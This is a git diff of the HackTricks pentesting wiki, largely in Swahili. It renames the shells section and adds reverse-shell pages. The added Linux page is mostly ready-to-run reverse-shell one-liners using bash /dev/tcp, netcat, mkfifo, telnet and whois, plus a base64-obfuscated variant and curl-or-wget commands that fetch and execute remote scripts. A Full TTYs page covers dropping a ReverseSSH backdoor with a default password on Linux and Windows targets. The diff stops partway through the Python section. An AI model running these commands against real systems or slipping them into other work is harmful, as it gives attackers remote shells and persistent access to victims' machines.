diff --git a/SUMMARY.md b/SUMMARY.md index 15aed9799..da21c1b58 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -74,11 +74,11 @@ * [Tunneling and Port Forwarding](generic-methodologies-and-resources/tunneling-and-port-forwarding.md) * [Threat Modeling](generic-methodologies-and-resources/threat-modeling.md) * [Search Exploits](generic-methodologies-and-resources/search-exploits.md) -* [Shells (Linux, Windows, MSFVenom)](generic-methodologies-and-resources/shells/README.md) - * [MSFVenom - CheatSheet](generic-methodologies-and-resources/shells/msfvenom.md) - * [Shells - Windows](generic-methodologies-and-resources/shells/windows.md) - * [Shells - Linux](generic-methodologies-and-resources/shells/linux.md) - * [Full TTYs](generic-methodologies-and-resources/shells/full-ttys.md) +* [Reverse Shells (Linux, Windows, MSFVenom)](generic-methodologies-and-resources/reverse-shells/README.md) + * [MSFVenom - CheatSheet](generic-methodologies-and-resources/reverse-shells/msfvenom.md) + * [Reverse Shells - Windows](generic-methodologies-and-resources/reverse-shells/windows.md) + * [Reverse Shells - Linux](generic-methodologies-and-resources/reverse-shells/linux.md) + * [Full TTYs](generic-methodologies-and-resources/reverse-shells/full-ttys.md) ## 🐧 Linux Hardening diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md index bce76bffc..ad0977002 100644 --- a/generic-methodologies-and-resources/pentesting-methodology.md +++ b/generic-methodologies-and-resources/pentesting-methodology.md @@ -1,8 +1,8 @@ # Pentesting Methodology {% hint style="success" %} -Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -10,7 +10,7 @@ Jifunze na fanya mazoezi ya GCP Hacking: {% endhint %} @@ -25,15 +25,15 @@ Ikiwa unavutiwa na **kazi ya hacking** na kuhack yasiyoweza kuhackwa - **tunataf
-_Logo za Hacktricks zimeundwa na_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ +_Logo za Hacktricks zimetengenezwa na_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ ### 0- Mashambulizi ya Kimwili -Je, una **ufikiaji wa kimwili** kwa mashine unayotaka kushambulia? Unapaswa kusoma baadhi ya [**mbinu kuhusu mashambulizi ya kimwili**](../hardware-physical-access/physical-attacks.md) na nyingine kuhusu [**kutoroka kutoka kwa programu za GUI**](../hardware-physical-access/escaping-from-gui-applications.md). +Je, una **ufikiaji wa kimwili** kwa mashine unayotaka kushambulia? Unapaswa kusoma baadhi ya [**hila kuhusu mashambulizi ya kimwili**](../hardware-physical-access/physical-attacks.md) na nyingine kuhusu [**kutoroka kutoka kwa programu za GUI**](../hardware-physical-access/escaping-from-gui-applications.md). ### 1 - [Kugundua mwenyeji ndani ya mtandao](pentesting-network/#discovering-hosts)/ [Kugundua Mali za kampuni](external-recon-methodology/) -**Inategemea** ikiwa **mtihani** unaofanya ni **mtihani wa ndani au wa nje** unaweza kuwa na hamu ya kutafuta **wenyeji ndani ya mtandao wa kampuni** (mtihani wa ndani) au **kutafuta mali za kampuni kwenye mtandao** (mtihani wa nje). +**Inategemea** ikiwa **mtihani** unayofanya ni **mtihani wa ndani au wa nje** unaweza kuwa na hamu ya kutafuta **wenyeji ndani ya mtandao wa kampuni** (mtihani wa ndani) au **kutafuta mali za kampuni kwenye mtandao** (mtihani wa nje). {% hint style="info" %} Kumbuka kwamba ikiwa unafanya mtihani wa nje, mara tu unavyoweza kupata ufikiaji wa mtandao wa ndani wa kampuni unapaswa kuanzisha tena mwongo huu. @@ -42,13 +42,13 @@ Kumbuka kwamba ikiwa unafanya mtihani wa nje, mara tu unavyoweza kupata ufikiaji ### **2-** [**Kufurahia mtandao**](pentesting-network/) **(Ndani)** **Sehemu hii inatumika tu ikiwa unafanya mtihani wa ndani.**\ -Kabla ya kushambulia mwenyeji huenda ukapendelea **kuiba baadhi ya akidi** **kutoka kwenye mtandao** au **kunusa** baadhi ya **data** ili kujifunza **kwa pasivu/aktively(MitM)** unachoweza kupata ndani ya mtandao. Unaweza kusoma [**Pentesting Network**](pentesting-network/#sniffing). +Kabla ya kushambulia mwenyeji huenda ukapendelea **kuiba baadhi ya akidi** **kutoka kwenye mtandao** au **kunusa** baadhi ya **data** ili kujifunza **kwa njia ya kupita/moja kwa moja (MitM)** unachoweza kupata ndani ya mtandao. Unaweza kusoma [**Pentesting Network**](pentesting-network/#sniffing). ### 3- [Skana Bandari - Kugundua huduma](pentesting-network/#scanning-hosts) -Jambo la kwanza kufanya unapo **angalia udhaifu katika mwenyeji** ni kujua ni **huduma zipi zinaendesha** katika bandari zipi. Hebu tuone [**zana za msingi za kuskan bandari za wenyeji**](pentesting-network/#scanning-hosts). +Jambo la kwanza kufanya unapokuwa **ukitafuta udhaifu katika mwenyeji** ni kujua ni **huduma zipi zinaendesha** katika bandari zipi. Hebu tuone [**zana za msingi za kuskan bandari za wenyeji**](pentesting-network/#scanning-hosts). -### **4-** [**Kutafuta exploit za toleo la huduma**](search-exploits.md) +### **4-** [**Kutafuta matukio ya toleo la huduma**](search-exploits.md) Mara tu unavyojua ni huduma zipi zinaendesha, na labda toleo lao, unapaswa **kutafuta udhaifu unaojulikana**. Huenda ukapata bahati na kuna exploit inayoweza kukupa shell... @@ -59,25 +59,25 @@ Ikiwa hakuna exploit ya kuvutia kwa huduma yoyote inayofanya kazi, unapaswa kuta **Ndani ya kitabu hiki utapata mwongozo wa pentest huduma za kawaida zaidi** (na nyingine ambazo si za kawaida sana)**. Tafadhali, tafuta kwenye orodha ya kushoto sehemu ya** _**PENTESTING**_ **(huduma zimepangwa kwa bandari zao za kawaida).** **Ninataka kutoa kumbukumbu maalum kwa** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **sehemu (kama ni kubwa zaidi).**\ -Pia, mwongozo mdogo juu ya jinsi ya [**kupata udhaifu unaojulikana katika programu**](search-exploits.md) unaweza kupatikana hapa. +Pia, mwongozo mdogo juu ya jinsi ya [**kutafuta udhaifu unaojulikana katika programu**](search-exploits.md) unaweza kupatikana hapa. -**Ikiwa huduma yako haipo ndani ya orodha, tafuta Google** kwa mafunzo mengine na **niambie ikiwa unataka niiongeze.** Ikiwa **huwezi kupata chochote** kwenye Google, fanya **pentesting yako ya kipofu**, unaweza kuanza kwa **kuungana na huduma, kuifanyia fuzzing na kusoma majibu** (ikiwa yapo). +**Ikiwa huduma yako haipo ndani ya orodha, tafuta kwenye Google** kwa mafunzo mengine na **niambie ikiwa unataka niiongeze.** Ikiwa **huwezi kupata chochote** kwenye Google, fanya **pentesting ya kipofu** mwenyewe, unaweza kuanza kwa **kuungana na huduma, kuifanyia fuzzing na kusoma majibu** (ikiwa yapo). #### 5.1 Zana za Kiotomatiki Pia kuna zana kadhaa ambazo zinaweza kufanya **tathmini za udhaifu za kiotomatiki**. **Ningependekeza ujaribu** [**Legion**](https://github.com/carlospolop/legion)**, ambayo ni zana niliyounda na inategemea maelezo kuhusu huduma za pentesting ambazo unaweza kupata katika kitabu hiki.** -#### **5.2 Kuangamiza huduma** +#### **5.2- Kuangamiza huduma** Katika hali fulani **Brute-Force** inaweza kuwa na manufaa ili **kuathiri** **huduma**. [**Pata hapa CheatSheet ya huduma tofauti za kuangamiza**](brute-force.md)**.** ### 6- [Phishing](phishing-methodology/) -Ikiwa katika hatua hii huja pata udhaifu wowote wa kuvutia unaweza **kuhitaji kujaribu phishing** ili kuingia ndani ya mtandao. Unaweza kusoma mbinu yangu ya phishing [hapa](phishing-methodology/): +Ikiwa katika hatua hii huja pata udhaifu wowote wa kuvutia unaweza **kuhitaji kujaribu phishing** ili kuingia ndani ya mtandao. Unaweza kusoma mbinu zangu za phishing [hapa](phishing-methodology/): -### **7-** [**Kupata Shell**](shells/) +### **7-** [**Kupata Shell**](reverse-shells/) -Kwa namna fulani unapaswa kuwa umepata **njia yoyote ya kutekeleza msimbo** katika mwathirika. Kisha, [orodha ya zana zinazowezekana ndani ya mfumo ambazo unaweza kutumia kupata shell ya kurudi itakuwa ya manufaa sana](shells/). +Kwa namna fulani unapaswa kuwa umepata **njia yoyote ya kutekeleza msimbo** katika mwathirika. Kisha, [orodha ya zana zinazowezekana ndani ya mfumo ambazo unaweza kutumia kupata shell ya kurudi itakuwa ya manufaa sana](reverse-shells/). Hasa katika Windows unaweza kuhitaji msaada wa **kuepuka antiviruses**: [**Angalia ukurasa huu**](../windows-hardening/av-bypass.md)**.**\\ @@ -91,20 +91,20 @@ Ikiwa una matatizo na shell, unaweza kupata hapa mkusanyiko mdogo wa **amri muhi ### **9 -** [**Uhamishaji**](exfiltration.md) -Huenda ukahitaji **kutoa data kutoka kwa mwathirika** au hata **kuingiza kitu** (kama vile scripts za kupandisha mamlaka). **Hapa una** [**post kuhusu zana za kawaida ambazo unaweza kutumia kwa madhumuni haya**](exfiltration.md)**.** +Huenda ukahitaji **kutoa data kutoka kwa mwathirika** au hata **kuingiza kitu** (kama vile skripti za kupandisha mamlaka). **Hapa una** [**post kuhusu zana za kawaida ambazo unaweza kutumia kwa madhumuni haya**](exfiltration.md)**.** ### **10- Kupandisha Mamlaka** #### **10.1- Privesc za Mitaa** -Ikiwa wewe si **root/Msimamizi** ndani ya sanduku, unapaswa kutafuta njia ya **kupandisha mamlaka.**\ +Ikiwa wewe si **root/Administrator** ndani ya sanduku, unapaswa kutafuta njia ya **kupandisha mamlaka.**\ Hapa unaweza kupata **mwongozo wa kupandisha mamlaka kwa ndani katika** [**Linux**](../linux-hardening/privilege-escalation/) **na katika** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\ Unapaswa pia kuangalia hizi kurasa kuhusu jinsi **Windows inavyofanya kazi**: * [**Uthibitishaji, Akidi, Mamlaka ya Token na UAC**](../windows-hardening/authentication-credentials-uac-and-efs/) * Jinsi [**NTLM inavyofanya kazi**](../windows-hardening/ntlm/) * Jinsi ya [**kuiba akidi**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md) katika Windows -* Mbinu kadhaa kuhusu [_**Active Directory**_](../windows-hardening/active-directory-methodology/) +* Hila kadhaa kuhusu [_**Active Directory**_](../windows-hardening/active-directory-methodology/) **Usisahau kuangalia zana bora za kuorodhesha njia za Kupandisha Mamlaka za ndani za Windows na Linux:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) @@ -122,15 +122,15 @@ Pata hapa njia tofauti za [**kudump nywila katika Windows**](https://github.com/ #### 11.2 - Kudumu **Tumia aina 2 au 3 tofauti za mitambo ya kudumu ili usihitaji kuathiri mfumo tena.**\ -**Hapa unaweza kupata baadhi ya** [**mbinu za kudumu kwenye active directory**](../windows-hardening/active-directory-methodology/#persistence)**.** +**Hapa unaweza kupata baadhi ya** [**hila za kudumu kwenye active directory**](../windows-hardening/active-directory-methodology/#persistence)**.** TODO: Kamilisha kudumu Post katika Windows & Linux ### 12 - Pivoting -Kwa **akidi zilizokusanywa** unaweza kuwa na ufikiaji kwa mashine nyingine, au labda unahitaji **kugundua na kuskan wenyeji wapya** (anza tena Mbinu ya Pentesting) ndani ya mitandao mipya ambapo mwathirika wako ameunganishwa.\ +Kwa **akidi zilizokusanywa** unaweza kuwa na ufikiaji kwa mashine nyingine, au labda unahitaji **kugundua na kuskan wenyeji wapya** (anzisha tena Mbinu ya Pentesting) ndani ya mitandao mipya ambapo mwathirika wako ameunganishwa.\ Katika kesi hii, tunneling inaweza kuwa muhimu. Hapa unaweza kupata [**post inayozungumzia tunneling**](tunneling-and-port-forwarding.md).\ -Unapaswa pia kuangalia post kuhusu [Mbinu ya pentesting ya Active Directory](../windows-hardening/active-directory-methodology/). Huko utapata mbinu nzuri za kuhamasisha, kupandisha mamlaka na kudump akidi.\ +Bila shaka unapaswa pia kuangalia post kuhusu [Mbinu ya pentesting ya Active Directory](../windows-hardening/active-directory-methodology/). Huko utapata hila nzuri za kuhamasisha, kupandisha mamlaka na kudump akidi.\ Angalia pia ukurasa kuhusu [**NTLM**](../windows-hardening/ntlm/), inaweza kuwa ya manufaa sana kuhamasisha katika mazingira ya Windows. ### ZAIDI @@ -139,13 +139,13 @@ Angalia pia ukurasa kuhusu [**NTLM**](../windows-hardening/ntlm/), inaweza kuwa #### **Kuvunja** -* [**Kuvunja Msingi wa Linux**](broken-reference) +* [**Kuvunja Msingi wa Linux**](broken-reference/) * [**Kuvunja Msingi wa Windows**](../binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md) * [**Zana za kuvunja za Msingi**](../binary-exploitation/basic-stack-binary-exploitation-methodology/tools/) #### [**Python ya Msingi**](python/) -#### **Mbinu za Crypto** +#### **Hila za Crypto** * [**ECB**](../crypto-and-stego/electronic-code-book-ecb.md) * [**CBC-MAC**](../crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md) @@ -158,8 +158,8 @@ Ikiwa unavutiwa na **kazi ya hacking** na kuhack yasiyoweza kuhackwa - **tunataf {% embed url="https://www.stmcyber.com/careers" %} {% hint style="success" %} -Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -167,7 +167,7 @@ Jifunze na fanya mazoezi ya GCP Hacking: {% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/README.md b/generic-methodologies-and-resources/reverse-shells/README.md new file mode 100644 index 000000000..2bebfa185 --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/README.md @@ -0,0 +1,53 @@ +{% hint style="success" %} +Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! +* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. + +
+{% endhint %} + + +# [**Shells - Linux**](linux.md) + +# [**Shells - Windows**](windows.md) + +# [**MSFVenom - CheatSheet**](msfvenom.md) + +# [**Full TTYs**](full-ttys.md) + +# **Shells zinazozalishwa kiotomatiki** + +* [**https://reverse-shell.sh/**](https://reverse-shell.sh/) +* [**https://www.revshells.com/**](https://www.revshells.com/) +* [**https://github.com/ShutdownRepo/shellerator**](https://github.com/ShutdownRepo/shellerator) +* [**https://github.com/0x00-0x00/ShellPop**](https://github.com/0x00-0x00/ShellPop) +* [**https://github.com/cybervaca/ShellReverse**](https://github.com/cybervaca/ShellReverse) +* [**https://liftoff.github.io/pyminifier/**](https://liftoff.github.io/pyminifier/) +* [**https://github.com/xct/xc/**](https://github.com/xct/xc/) +* [**https://weibell.github.io/reverse-shell-generator/**](https://weibell.github.io/reverse-shell-generator/) +* [**https://github.com/t0thkr1s/revshellgen**](https://github.com/t0thkr1s/revshellgen) +* [**https://github.com/mthbernardes/rsg**](https://github.com/mthbernardes/rsg) + + + +{% hint style="success" %} +Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! +* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/full-ttys.md b/generic-methodologies-and-resources/reverse-shells/full-ttys.md new file mode 100644 index 000000000..c216d44a3 --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/full-ttys.md @@ -0,0 +1,134 @@ +# Full TTYs + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Full TTY + +Kumbuka kwamba shell uliyoweka katika mabadiliko ya `SHELL` **lazima** iwe **imeorodheshwa ndani ya** _**/etc/shells**_ au `Thamani ya mabadiliko ya SHELL haikupatikana katika faili ya /etc/shells Tukio hili limeripotiwa`. Pia, kumbuka kwamba vipande vifuatavyo vinatumika tu katika bash. Ikiwa uko katika zsh, badilisha kuwa bash kabla ya kupata shell kwa kukimbia `bash`. + +#### Python + +{% code overflow="wrap" %} +```bash +python3 -c 'import pty; pty.spawn("/bin/bash")' + +(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; +``` +{% endcode %} + +{% hint style="info" %} +Unaweza kupata **idadi** ya **mifereji** na **safuwima** kwa kutekeleza **`stty -a`** +{% endhint %} + +#### script + +{% code overflow="wrap" %} +```bash +script /dev/null -qc /bin/bash #/dev/null is to not store anything +(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; +``` +{% endcode %} + +#### socat +```bash +#Listener: +socat file:`tty`,raw,echo=0 tcp-listen:4444 + +#Victim: +socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 +``` +### **Spawn shells** + +* `python -c 'import pty; pty.spawn("/bin/sh")'` +* `echo os.system('/bin/bash')` +* `/bin/sh -i` +* `script -qc /bin/bash /dev/null` +* `perl -e 'exec "/bin/sh";'` +* perl: `exec "/bin/sh";` +* ruby: `exec "/bin/sh"` +* lua: `os.execute('/bin/sh')` +* IRB: `exec "/bin/sh"` +* vi: `:!bash` +* vi: `:set shell=/bin/bash:shell` +* nmap: `!sh` + +## ReverseSSH + +Njia rahisi ya **interactive shell access**, pamoja na **file transfers** na **port forwarding**, ni kuweka server ya ssh iliyo na muunganisho wa kudumu [ReverseSSH](https://github.com/Fahrj/reverse-ssh) kwenye lengo. + +Hapa kuna mfano wa `x86` wenye binaries zilizoshinikizwa na upx. Kwa binaries nyingine, angalia [releases page](https://github.com/Fahrj/reverse-ssh/releases/latest/). + +1. Andaa mahali ili kukamata ombi la port forwarding la ssh: + +{% code overflow="wrap" %} +```bash +# Drop it via your preferred way, e.g. +wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh + +/dev/shm/reverse-ssh -v -l -p 4444 +``` +{% endcode %} + +* (2a) Lengo la Linux: + +{% code overflow="wrap" %} +```bash +# Drop it via your preferred way, e.g. +wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh + +/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2 +``` +{% endcode %} + +* (2b) Lengo la Windows 10 (kwa toleo za awali, angalia [project readme](https://github.com/Fahrj/reverse-ssh#features)): + +{% code overflow="wrap" %} +```bash +# Drop it via your preferred way, e.g. +certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe + +reverse-ssh.exe -p 4444 kali@10.0.0.2 +``` +{% endcode %} + +* Ikiwa ombi la kupeleka bandari la ReverseSSH lilifanikiwa, sasa unapaswa kuwa na uwezo wa kuingia kwa kutumia nenosiri la kawaida `letmeinbrudipls` katika muktadha wa mtumiaji anayekimbia `reverse-ssh(.exe)`: +```bash +# Interactive shell access +ssh -p 8888 127.0.0.1 + +# Bidirectional file transfer +sftp -P 8888 127.0.0.1 +``` +## No TTY + +Ikiwa kwa sababu fulani huwezi kupata TTY kamili, bado unaweza kuingiliana na programu ambazo zinatarajia pembejeo za mtumiaji. Katika mfano ufuatao, nenosiri linapitishwa kwa `sudo` kusoma faili: +```bash +expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "";send "\r\n";interact' +``` +{% hint style="success" %} +Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! +* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/linux.md b/generic-methodologies-and-resources/reverse-shells/linux.md new file mode 100644 index 000000000..f476525a7 --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/linux.md @@ -0,0 +1,362 @@ +# Shells - Linux + +{% hint style="success" %} +Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! +* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. + +
+{% endhint %} + +**Kundi la Usalama wa Jaribio** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +*** + +**Ikiwa una maswali kuhusu yoyote ya hizi shells unaweza kuangalia na** [**https://explainshell.com/**](https://explainshell.com) + +## Full TTY + +**Mara tu unapopata reverse shell**[ **soma ukurasa huu ili kupata full TTY**](full-ttys.md)**.** + +## Bash | sh +```bash +curl https://reverse-shell.sh/1.1.1.1:3000 | bash +bash -i >& /dev/tcp// 0>&1 +bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP +0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196 +exec 5<>/dev/tcp//; while read line 0<&5; do $line 2>&5 >&5; done + +#Short and bypass (credits to Dikline) +(sh)0>/dev/tcp/10.10.10.10/9091 +#after getting the previous shell to get the output to execute +exec >&0 +``` +Usisahau kuangalia na shell nyingine: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, na bash. + +### Shell salama ya alama +```bash +#If you need a more stable connection do: +bash -c 'bash -i >& /dev/tcp// 0>&1' + +#Stealthier method +#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0 +echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null +``` +#### Maelezo ya Shell + +1. **`bash -i`**: Sehemu hii ya amri inaanzisha shell ya Bash ya kuingiliana (`-i`). +2. **`>&`**: Sehemu hii ya amri ni alama ya kifupi ya **kuhamasisha pato la kawaida** (`stdout`) na **kosa la kawaida** (`stderr`) kwenda **mahali pamoja**. +3. **`/dev/tcp//`**: Hii ni faili maalum ambayo **inaakisi muunganisho wa TCP kwa anwani ya IP na bandari iliyoainishwa**. +* Kwa **kuhamasisha pato na mwelekeo wa makosa kwenda kwenye faili hii**, amri hiyo kwa ufanisi inatuma pato la kikao cha shell ya kuingiliana kwenye mashine ya mshambuliaji. +4. **`0>&1`**: Sehemu hii ya amri **inaelekeza pembejeo ya kawaida (`stdin`) kwenda kwenye mahali pamoja na pato la kawaida (`stdout`)**. + +### Unda kwenye faili na utekeleze +```bash +echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1/ 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh; +wget http:///shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh +``` +## Forward Shell + +Wakati wa kushughulikia **Remote Code Execution (RCE)** udhaifu ndani ya programu ya wavuti inayotumia Linux, kupata reverse shell kunaweza kuzuia na ulinzi wa mtandao kama sheria za iptables au mifumo ya kuchuja pakiti ngumu. Katika mazingira kama haya, njia mbadala ni kuanzisha PTY (Pseudo Terminal) shell ili kuingiliana na mfumo ulioathirika kwa ufanisi zaidi. + +Zana inayopendekezwa kwa ajili ya hili ni [toboggan](https://github.com/n3rada/toboggan.git), ambayo inarahisisha mwingiliano na mazingira ya lengo. + +Ili kutumia toboggan kwa ufanisi, tengeneza moduli ya Python iliyoundwa kwa muktadha wa RCE wa mfumo wako wa lengo. Kwa mfano, moduli inayoitwa `nix.py` inaweza kuandikwa kama ifuatavyo: +```python3 +import jwt +import httpx + +def execute(command: str, timeout: float = None) -> str: +# Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution +token = jwt.encode( +{"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^", algorithm="HS256" +) + +response = httpx.get( +url="https://vulnerable.io:3200", +headers={"Authorization": f"Bearer {token}"}, +timeout=timeout, +# ||BURP|| +verify=False, +) + +# Check if the request was successful +response.raise_for_status() + +return response.text +``` +Na kisha, unaweza kuendesha: +```shell +toboggan -m nix.py -i +``` +Ili kutumia moja kwa moja shell ya mwingiliano. Unaweza kuongeza `-b` kwa ajili ya uunganisho wa Burpsuite na kuondoa `-i` kwa wrapper ya rce ya msingi zaidi. + +Mwingine uwezekano ni kutumia utekelezaji wa shell ya mbele ya `IppSec` [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell). + +Unahitaji tu kubadilisha: + +* URL ya mwenyeji aliye hatarini +* Kichwa na kiambatisho cha payload yako (ikiwa ipo) +* Njia ambayo payload inatumwa (headers? data? taarifa za ziada?) + +Kisha, unaweza tu **kutuma amri** au hata **kutumia amri ya `upgrade`** kupata PTY kamili (kumbuka kwamba mabomba yanapozungumziwa na kuandikwa kwa kuchelewesha takriban 1.3s). + +## Netcat +```bash +nc -e /bin/sh +nc | /bin/sh #Blind +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f +nc | /bin/bash | nc +rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0 1>/tmp/bkpipe +``` +## gsocket + +Angalia kwenye [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/) +```bash +bash -c "$(curl -fsSL gsocket.io/x)" +``` +## Telnet +```bash +telnet | /bin/sh #Blind +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet >/tmp/f +telnet | /bin/bash | telnet +rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0 1>/tmp/bkpipe +``` +## Whois + +**Mshambuliaji** +```bash +while true; do nc -l ; done +``` +Ili kutuma amri, iandike, bonyeza enter na bonyeza CTRL+D (kuacha STDIN) + +**Victim** +```bash +export X=Connected; while true; do X=`eval $(whois -h -p "Output: $X")`; sleep 1; done +``` +## Python +```bash +#Linux +export 